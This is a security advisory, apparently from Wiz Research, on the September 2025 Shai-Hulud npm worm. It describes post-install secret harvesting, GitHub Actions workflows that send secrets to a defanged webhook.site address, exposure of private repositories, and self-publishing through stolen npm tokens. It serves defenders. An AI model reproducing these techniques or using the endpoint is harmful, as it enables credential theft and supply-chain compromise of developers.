On September 15, 2025, malicious versions of multiple popular packages were published to npm with a post-install script that harvested sensitive developer assets and exfiltrated data to attacker-created public GitHub repos named Shai-Hulud. Wiz Research estimates that this activity is a downstream result of GitHub tokens being exfiltrated during the s1ngularity campaign that occurred in late August 2025. We are continuing to monitor the situation and add new detections as necessary.
Once a version of one of the malicious packages is installed, the included payload uses the TruffleHog secret scanning tool to identify secrets, in addition to harvesting environment variables and IMDS-exposed cloud keys when available. Additionally, the script validates collected credentials and, if it finds GitHub tokens, it abuses them in multiple ways:
- It creates a public repository named Shai-Hulud containing a dump of harvested secrets
- It pushes a new GitHub Actions workflow to all accessible repositories. This action exfiltrates each repo’s secrets to
https://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 - It migrates private organizational repositories to public personal repositories under the attacker-controlled user (private org/repo → public user/repo) with the description “Shai-Hulud Migration”, and a -migration suffix added to the name.
This attack is a self-propagating worm. When a compromised package encounters additional npm tokens in a victim environment, it will automatically publish malicious versions of any packages it can access. See further discussion of the malicious code in Socket's initial analysis.
Based on victimology, Wiz Research assesses this activity is tied to the recent s1ngularity / Nx supply chain attack, where initial GitHub token theft enabled the broader chain of compromise and publicization of formerly private repositories. The initial npm packages that started this chain reaction included multiple known-compromised victims of the s1ngularity attack.